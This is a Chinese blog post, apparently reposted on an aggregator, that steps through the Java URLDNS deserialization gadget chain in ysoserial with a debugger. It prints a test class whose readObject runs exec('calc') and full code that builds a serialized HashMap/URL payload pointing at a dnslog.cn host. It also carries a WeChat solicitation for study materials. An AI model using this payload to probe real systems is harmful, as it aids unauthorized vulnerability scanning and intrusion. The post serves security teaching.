Java反序列化:URLDNS的反序列化调试分析

这篇具有很好参考价值的文章主要介绍了Java反序列化:URLDNS的反序列化调试分析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

URLDNS链子是Java反序列化分析的第0课,网上也有很多优质的分析文章。

笔者作为Java安全初学者,也从0到1调试了一遍,现在给出调试笔记。

一. Java反序列化前置知识

Java原生链序列化:利用Java.io.ObjectInputStream对象输出流的writerObject方法实现Serializable接口,将对象转化成字节序列。

Java原生链反序列化:利用Java.io.ObjectOutputStream对象输入流的readObject方法实现将字节序列转化成对象。

测试源码如下,此部分源码参考了ol4three师傅的博客:

package serialize;
​
import java.io.*;
​
public class deserTest implements Serializable {
    private int n;
    public deserTest(int n) {
        this.n=n;
    }
​
    @Override
    public String toString() {
        return "deserTest2 [n=" + n + ", getClass()=" + getClass() + ", hashCode()=" + hashCode() + ", toString()="
                + super.toString() + "]";
    }
​
    // 反序列化
    private void readObject(java.io.ObjectInputStream in) throws IOException,ClassNotFoundException{
        in.defaultReadObject();                 
        Runtime.getRuntime().exec("calc");          
        System.out.println("test");
    }
​
    public static void main(String[] args) {
        deserTest x = new deserTest(5);
        operation1.ser(x);
        operation1.deser();
        x.toString();
    }
}
​
​
// 实现序列化和反序列化具体细节的类
class operation1{
​
    // 将输出字节流写入文件中进行封存
    public static void ser(Object obj) {
        // 序列化操作,写操作
        try {
             // 首先文件落地object.obj存储输出流,绑定输出流           
            ObjectOutputStream ooStream = new ObjectOutputStream(new FileOutputStream("object.obj"));
​
            // 重定向将输出流字节写入文件
            ooStream.writeObject(obj);
            
            ooStream.flush();
            ooStream.close();
​
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }catch (IOException e) {
            // TODO: handle exception
            e.printStackTrace();
        }
    }
    
    
    public static void deser() {
        // 反序列化,读取操作
        try {
            // 绑定输入流
            ObjectInputStream iiStream = new ObjectInputStream(new FileInputStream("object.obj"));
            
            // 反序列化时需要从相关的文件容器中读取输出的字节流
            // 读取字节流操作为readObject,所以重写readObject可以执行自定义代码
            Object xObject = iiStream.readObject();
            iiStream.close();
        } catch (IOException e) {
            // TODO: handle exception
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
    }
}

二. ysoserial环境搭建

IDE就直接用JetBrains的IDEA就行

直接拿Java安全payload集成化工具ysoserial进行分析,这里面已经有现成的环境了

https://github.com/frohoff/ysoserial

注意配置好相应的JDKSDK版本:

三. URLDNS攻击链

  • 影响的版本问题:与JDK版本无关,其攻击链实现依赖于Java内置类,与第三方库无关

  • URLDNS这条反序列化链只能发起DNS请求,无法进行其他利用,可以作为验证是否有反序列化漏洞的姿势

调试分析

Gadget Chain:

Deserializer.deserialize() -> HashMap.readObject() -> HashMap.putVal() -> HashMap.hash() ->URL.hashCode() ->

getHostAddress()

在getHostAddress函数中进行域名解析,从而可以被DNSLog平台捕获

URLDNS程序入口

ysoserial-master\src\main\java\ysoserial\payloads\URLDNS.java路径下有URLDNS.java文件

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

main主函数的run函数打断点进入

这个ysoserial-masterpayload运行结构大致是有一个专门的PayloadRunner运行程序,然后统一调用来运行各部分的payload

首先是进行序列化:

继续往下,生成command,由于是分析URLDNS攻击链,所以只需要修改将返回值为dnslog的临时地址

创建实例后,进入到URLDNSgetObjectpayload函数

getObject函数中应该注意的是:声明了HashMap对象和URL对象,并进行put哈希绑定,最后设置作用域

反序列化链子:

在反序列化入口处打断点:

在反序列化时调用了readObject函数

然后进入HashMap.javareadObject函数

readObject中调试到此行,了putval,在此处IDEA这个IDE可以选择进入的函数,直接进入后者hash

由于我们读入字节序列,需要将其恢复成相应的对象结构,那么就需要重新putval

传入的key不为空,执行key.hashCode

进一步在URL.java文件下

进入URLStreamHandlerhashCode

产生解析:

总的来说,利用链思路如下:

在反序列化URLDNS对象时,也需要反序列化HashMap对象,从而调用了HashMap.readObject()的重写函数,重写函数中调用了哈希表putval等的相关重构函数,在hashcode下调用了getHostAddress函数

那么反之,为什么首次声明的时候没有调用到了getHostAddress函数,现在给出声明时的函数路线:

ht.put() --> .. --> SilentURLStreamHandler.getHostAddress()

该函数为空实现

列出几个路线上的关键函数看看:

由于此处keyString类型,则进入String.hashCode

相比之下,在反序列化中keyURL类型

设置了不发起dns解析

具体执行流,可以看下时序图,我就不讲了^^

四. URLDNS链的使用

import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
​
public class Main{
​
​
    // 序列化前不发生dns解析
    static class SilentURLStreamHandler extends URLStreamHandler{
        protected URLConnection openConnection(URL n) throws IOException{
            return null;
        }
​
        protected synchronized InetAddress getHostAddress(URL n)
        {
            return null;
        }
    }
​
    public static void main(String[] args) throws Exception{
​
        HashMap hashMap = new HashMap();
​
        // 设置put时不发起dns解析
        URLStreamHandler handler = new Main.SilentURLStreamHandler();
        URL url = new URL(null, "http://jloqk8.dnslog.cn", handler);
​
​
        // 利用Java反射机制在动态执行时获取类
        Class clazz = Class.forName("java.net.URL");
        Field f = clazz.getDeclaredField("hashCode");
        f.setAccessible(true);
​
        hashMap.put(url, "123");
        f.set(url, -1);
​
        // 对象输出流绑定文件输出流
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("out.bin"));
        oos.writeObject(hashMap);   // 序列化
​
        // 对象输入流绑定文件输入流
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin"));
        ois.readObject();           // 反序列化
​
    }
​
}

更多网安技能的在线实操练习,请点击这里>>

 文章来源地址https://www.toymoban.com/news/detail-554571.html

到了这里,关于Java反序列化:URLDNS的反序列化调试分析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【WEB安全】不安全的反序列化

    序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同系统之间进行传输或存储,并在需要时重新构造。 **序列化是指将对象或数据结构转换为字节流的过程。**在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节可以按照一定的协议

    2024年02月16日
    浏览(52)
  • 渗透测试漏洞原理之---【不安全的反序列化】

    为什么要序列化? 序列化,“将对象的状态信息转换为可以存储或传输的形式的过程”,这种形式⼤多为字节流、字符串、json 串。在序列化期间内,将对象当前状态写⼊到临时或永久性的存储区。以后,就可以通过从存储区中读取或还原(反序列化)对象的状态,重新创建

    2024年02月09日
    浏览(46)
  • owasp top10之不安全的反序列化

    ​ 更多网络安全干货内容: 点此获取 ——————— Java 提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。 将序列化对象写入文件之后,可以从文件中读取

    2024年01月22日
    浏览(47)
  • 由Django-Session配置引发的反序列化安全问题

    漏洞成因位于目标配置文件settings.py下 关于这两个配置项 SESSION_ENGINE: 在Django中, SESSION_ENGINE  是一个设置项,用于指定用于存储和处理会话(session)数据的引擎。 SESSION_ENGINE  设置项允许您选择不同的后端引擎来存储会话数据,例如: 数据库后端  ( django.contrib.sessions.b

    2024年02月08日
    浏览(49)
  • java反序列化漏洞分析

    Java反序列化漏洞(Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码,导致反序列化过程中执行恶意代码。本文将介绍Java反序列化漏洞的原理、攻击方式和防范措施。 一、Java序列化和

    2024年02月13日
    浏览(45)
  • Java反序列化漏洞-CC1利用链分析

    目录 一、前置知识 1. 反射 2. Commons Collections是什么 3. 环境准备 二、分析利用链 1. Transformer 2. InvokeTransformer 执行命令 3. ConstantTransformer 4. ChainedTransformer 执行命令 5. TransformedMap 6. AbstractInputCheckedMapDecorator 7. AnnotationInvocationHandler 三、编写POC 1. ChainedTransformer 2. decorate 3. Annotatio

    2024年02月04日
    浏览(45)
  • Java代码审计&原生反序列化&CC链跟踪分析

    希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!   个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser\\\'s Blog 在前一篇文章我分析了Commons Collections1链​​​​​​​,其中跟链的顺序是:source=gadget=sink,但如果站在漏洞挖掘的角度顺序是倒过来的:sink=gadget=s

    2024年01月24日
    浏览(38)
  • drf——Request源码分析、序列化组件、序列化类的使用(字段类和参数)、反序列化校验和保存

    views.py中 urls.py中 序列化类 字段 字段构造方式 BooleanField BooleanField() NullBooleanField NullBooleanField() CharField CharField(max_length=None, min_length=None, allow_blank=False, trim_whitespace=True) EmailField EmailField(max_length=None, min_length=None, allow_blank=False) RegexField RegexField(regex, max_length=None, min_length=None, a

    2024年02月05日
    浏览(40)
  • Java序列化和反序列化

    目录 一、序列化和反序列化 二、Java序列化演示 三、反序列化漏洞 1、含义 ​序列化就是内存中的对象写入到IO流中,保存的格式可以是二进制或者文本内容。反序列化就是IO流还原成对象。 2、用途 (1)传输网络对象 (2)保存Session 1、序列化 java.io.ObjectOutputStream代表对象

    2023年04月25日
    浏览(38)
  • JDBC反序列化分析

    找两个序列化后的bin文件,进行对比,可以发现前两个字节是固定的 AC , ED ,变十进制就是 -84 , -19 记住这两个数,后面分析的时候会用到 触发点在 com.mysql.cj.jdbc.result.ResultSetImpl.getObject() 可以看到在触发readObject之前还对data的前两个字节进行了比较来判断是不是序列化对象,

    2024年04月08日
    浏览(63)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包